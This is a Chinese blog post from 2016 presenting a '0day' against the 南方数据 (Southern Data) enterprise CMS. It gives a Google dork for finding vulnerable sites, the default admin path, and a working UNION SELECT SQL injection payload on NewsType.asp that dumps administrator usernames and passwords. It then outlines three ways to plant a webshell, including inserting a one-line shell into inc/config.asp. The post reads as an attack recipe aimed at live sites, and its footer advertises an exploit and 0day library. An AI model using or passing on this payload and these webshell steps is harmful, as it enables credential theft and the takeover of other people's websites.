南方数据企业0day漏洞爆后台密码

作者 : laolisafe 本文共439个字,预计阅读时间需要2分钟 发布时间: 2016-11-10 共2.07K人阅读

南方数据的漏洞比较多各种版本的漏洞也显而易见。
这里要讲的是南方数据企业0day直接爆后台密码方法。
南方数据企业0day漏洞爆后台密码
谷歌搜索:inurl:”HomeMarket.asp”
默认后台地址:/admin
直接在网址后面加上利用代码即可直接爆出管理员的帐号密码
利用代码:

NewsType.asp?SmallClass=' union select 0,username+CHR(124)+password,2,3,4,5,6,7,8,9 from admin union select * from news where 1=2 and ''='


爆出帐号密码后直接解密就可以获得管理员的帐号密码。然后在进一步的拿webshell
1、注册用户上传拿shell,这个比较直接,可以不进后台和在不知道用户名密码的情况下。
2、进后台备份数据库
3、在网站配置的版权信息里插入一句话,一句话地址写入到 http://www.xxx.com/inc/config.asp
这里只讲常见的几种,具体还是要看实际过程而定。

转载声明:本站文章若无特别说明,皆为原创,转载请注明来源:大老李的Blog,谢谢!^^
大老李的Blog|渗透测试论坛|红蓝对抗|大型Web安全问答社区 » 南方数据企业0day漏洞爆后台密码

常见问题FAQ

下载须知:
所有工具以及资源来自网络收集,所有下载,仅供学习交流。禁止利用从本站点下载的工具进行非法活动,从事危害国家网络安全等行为,请遵守相关法律规定,如有违反与本站无关。
会员的作用是什么?
本站会上线exp漏洞库与最新0day供会员下载

发表评论

提供最优质的资源集合

立即查看 了解详情